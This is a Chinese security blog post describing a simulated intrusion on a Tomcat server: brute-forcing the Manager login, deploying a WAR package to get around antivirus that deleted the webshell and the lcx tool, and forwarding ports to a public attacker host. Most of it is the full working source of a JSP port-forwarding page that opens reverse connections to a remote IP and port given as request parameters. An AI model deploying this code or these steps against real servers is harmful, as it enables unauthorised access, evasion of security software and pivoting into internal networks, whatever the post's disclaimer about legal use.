声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。 |
|---|
这篇文章是@欧根亲王号师傅19年投稿发在星球的,经他同意转发至公众号,内容比较基础。
记得他当时是在本地模拟的一个实战场景来做的这个测试实验(绕过安全防护进行端口转发)。
0x01 环境简要
目标主机:Widnows
目标防护软件:Antimalware
目标环境:JSP,Tomcat,Apache
本地主机:Windows、Kali
所需工具:Aapache爆破工具,Lcx,JSP代码,公网IP主机一个
所遇见问题:lcx被杀,webshell被杀
0x02 进攻说明
一、爆破登录口令
爆破Tomcat Web Application Manager,这里不做深入说明,大家都懂的
二、上传webshell
由于服务器上防护软件问题,上传的webshell被杀,lcx工具被杀,这里采取以jsp转发端口的形式来绕过
三、准备jsp页面的war包
使用kali把准备好的jsp页面打包,进入jsp页面目录下执行以下命令打包
代码语言:javascript复制jar -cvf aces.war
四、通过已有webshell创建用户名密码
五、通过后台部署war包
六、设置lcx监听本地端口并转发
使用lcx监听本地55并转发到3399端口上
七、访问jsp文件,并设置相关转发参数
代码语言:javascript复制参数说明:
lip=127.0.0.1
lp=需要转发的本地端口
rip=公网监听IP
rp=公网IP监听的端口号
m=转发的模式
0x03 验证
成功登录,自此本次实验结束
0x04 JSP源码
代码语言:javascript复制<%@page pageEncoding="GBK"%>
<%@page import="java.io.*"%>
<%@page import="java.util.*"%>
<%@page import="java.nio.charset.*"%>
<%@page import="javax.servlet.http.HttpServletRequestWrapper"%>
<%@page import="java.net.*"%>
<%
/*code by KingX*/
class KPortTran {
public void listen(String port1, String port2) {
ServerSocket listenServerSocket = null;
ServerSocket outServerSocket = null;
try {
listenServerSocket = new ServerSocket(Integer.parseInt(port1));
outServerSocket = new ServerSocket(Integer.parseInt(port2));
} catch (NumberFormatException e) {
} catch (IOException e) {
}
Socket listenSocket = null;
Socket outSocket = null;
try {
while (true) {
listenSocket = listenServerSocket.accept();
outSocket = outServerSocket.accept();
new tranThread(outSocket, listenSocket).start();
new tranThread(listenSocket, outSocket).start();
Thread.sleep(200);
}
} catch (Exception e) {
}
}
public void slave(String targetIP, String port1, String srcIP, String port2) throws IOException {
InetAddress src = InetAddress.getByName(srcIP);
InetAddress dest = InetAddress.getByName(targetIP);
int p1 = Integer.parseInt(port1);
int p2 = Integer.parseInt(port2);
new Server(src, p2, dest, p1, true);
}
public void tran(String srcIP, String port1, String targetIP, String port2)
throws NumberFormatException, IOException {
InetAddress src = InetAddress.getByName(srcIP);
InetAddress dest = InetAddress.getByName(targetIP);
int p1 = Integer.parseInt(port1);
int p2 = Integer.parseInt(port2);
new Server(src, p1, dest, p2, false);
}
class tranThread extends Thread {
Socket in;
Socket out;
InputStream is;
OutputStream os;
public tranThread(Socket in, Socket out) throws IOException {
this.is = in.getInputStream();
this.os = out.getOutputStream();
this.in = in;
this.out = out;
}
private void closeSocket() {
try {
is.close();
os.close();
in.close();
out.close();
} catch (IOException e) {
}
}
@Override
public void run() {
super.run();
byte[] buffer = new byte[4096];
int len = -1;
try {
while (true) {
if (in.isClosed() || out.isClosed()|| (len = is.read(buffer, 0, buffer.length)) == -1) {
break;
} else {
os.write(buffer, 0, len);
os.flush();
}
}
} catch (IOException e) {
closeSocket();
} finally {
closeSocket();
}
}
}
class Server extends Thread {
InetAddress src;
InetAddress dest;
int p1, p2;
boolean reverse = false;
public Server(InetAddress srcIP, int srcPort, InetAddress targetIP,
int targetPort, boolean flag) {
this.src = srcIP;
this.dest = targetIP;
this.p1 = srcPort;
this.p2 = targetPort;
this.reverse = flag;
start();
}
@Override
public void run() {
super.run();
if (reverse) {
try {
Socket s = new Socket(src, p1);
Socket s2 = new Socket(dest, p2);
new tranThread(s, s2).start();
new tranThread(s2, s).start();
while (true) {
if (s2.isClosed() || s.isClosed()) {
if (s2.isClosed()) {
s2 = new Socket(dest, p2);
}
if (s.isClosed()) {
s = new Socket(src, p1);
}
new tranThread(s, s2).start();
new tranThread(s2, s).start();
}
Thread.sleep(1000);
}
} catch (IOException e) {
} catch (InterruptedException e) {
}
} else {
ServerSocket ss;
try {
ss = new ServerSocket(p1, 5, src);
while (true) {
Socket s = ss.accept();
Socket s2 = new Socket(dest, p2);
new tranThread(s, s2).start();
new tranThread(s2, s).start();
}
} catch (IOException e) {
e.printStackTrace();
}
}
}
}
}
%>
<%
final String localIP = request.getParameter("lip");
final String localPort = request.getParameter("lp");
final String localPort2 = request.getParameter("lp2");
final String remoteIP =request.getParameter("rip");
final String remotePort =request.getParameter("rp");
final String mode =request.getParameter("m");
KPortTran pt = new KPortTran();
if (mode.equals("tran")) {
pt.tran(localIP, localPort, remoteIP , remotePort);
}
if (mode.equals("slave")) {
pt.slave(localIP, localPort, remoteIP , remotePort);
}
if (mode.equals("listen")) {
pt.listen(localPort, localPort2);
}
%>
